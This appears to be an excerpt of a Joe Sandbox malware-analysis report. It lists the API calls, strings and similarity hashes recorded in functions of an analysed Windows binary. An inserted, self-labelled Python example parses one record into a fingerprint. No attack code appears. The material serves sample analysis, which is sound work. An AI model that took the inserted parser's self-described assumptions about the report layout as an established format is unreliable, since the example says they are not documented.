                                                                                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                              • String ID:
                                                                                              • API String ID: 4116747274-0
                                                                                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                              • _wcslen.LIBCMT ref: 00461683
                                                                                              • __swprintf.LIBCMT ref: 00461721
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                              • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                              • GetParent.USER32(?), ref: 004618C3
                                                                                              • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 1899580136-679674701
                                                                                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu$Sleep
                                                                                              • String ID: 0
                                                                                              • API String ID: 1196289194-4108050209
                                                                                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0043143E
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 3300687185-3887548279
                                                                                              • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                              • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                              APIs
                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 1976180769-4113822522
                                                                                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                              • String ID:
                                                                                              • API String ID: 461458858-0
                                                                                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                              • DeleteObject.GDI32(?), ref: 004301D0
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3969911579-0
                                                                                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 956284711-4108050209
                                                                                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 1965227024-3771769585
                                                                                              • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                              • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove_wcslen
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 369157077-1007645807
                                                                                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
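Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser that turns one of the function records above into a structured call sequence, so that records from several reports can be diffed or deduplicated by their ordered MODULE!Api sequence instead of by eye. The record text embedded in the block is copied, abridged (the Associated dump lines are left out), from the mciSendStringW function at 0045F5D5 immediately above; the regular expressions, the ApiCall and FunctionRecord classes and the sequence_id fingerprint are this example's own assumptions about the report layout, not a documented Joe Sandbox format.

```python
"""Parse one Joe Sandbox 'APIs' function record into a call-sequence signature.

Added example for this report page; it is not Joe Sandbox code and not part of
the analysed sample.  SAMPLE_RECORD is copied (abridged) from the function at
0045F5D5 in the report.  The regexes, the dataclasses and the sequence_id hash
are this example's own assumptions about the report layout, not a documented
format.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass, field
from typing import Optional

# Three bullet shapes occur in the report's API lists:
#   • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
#   • GetParent.USER32 ref: 00445BF8
#   • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Generic "• Key: value" bullet (String ID, API String ID, Opcode ID, ...)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                    # address of the call site, as printed
    subcall_of: Optional[str]   # callee address when listed as "Part of subcall"


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    def direct_calls(self) -> list[ApiCall]:
        """Calls made by the function itself, excluding inlined subcall imports."""
        return [c for c in self.calls if c.subcall_of is None]

    def sequence_id(self) -> str:
        """Order-preserving fingerprint of the direct MODULE!Api sequence."""
        seq = "|".join(f"{c.module}!{c.name}" for c in self.direct_calls())
        return hashlib.sha256(seq.encode("utf-8")).hexdigest()[:16]


def parse_record(text: str) -> FunctionRecord:
    """Parse the plain-text lines of one function record."""
    rec = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m["args"]
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            rec.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            rec.fields[m["key"]] = m["val"]
            if m["key"] == "String ID" and m["val"]:
                # The report joins the referenced strings with '$'
                rec.strings = m["val"].split("$")
    return rec


def summarize(rec: FunctionRecord) -> dict:
    """Compact view suitable for diffing records across reports."""
    direct = rec.direct_calls()
    return {
        "sequence_id": rec.sequence_id(),
        "apis": [f"{c.module}!{c.name}" for c in direct],
        "modules": sorted({c.module for c in direct}),
        "strings": rec.strings,
        "opcode_id": rec.fields.get("Opcode ID", ""),
    }


# Constructed input: copied (abridged) from the record for 0045F5D5 in the report.
SAMPLE_RECORD = """\
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: SendString$_memmove_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
"""

if __name__ == "__main__":
    import json
    print(json.dumps(summarize(parse_record(SAMPLE_RECORD)), indent=2))
```

Because sequence_id is computed over the direct calls only, the two "Part of subcall function" lines do not change it, which keeps the fingerprint stable when the report lists a callee's own imports inline. The Opcode ID and Instruction Fuzzy Hash are carried through in the fields dictionary so the parsed record can still be cross-referenced with the report's own Similarity section.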
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00445BF8
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                              • __wcsicoll.LIBCMT ref: 00445C33
                                                                                              • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 3125838495-3381328864
                                                                                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                              Memory Dump Source
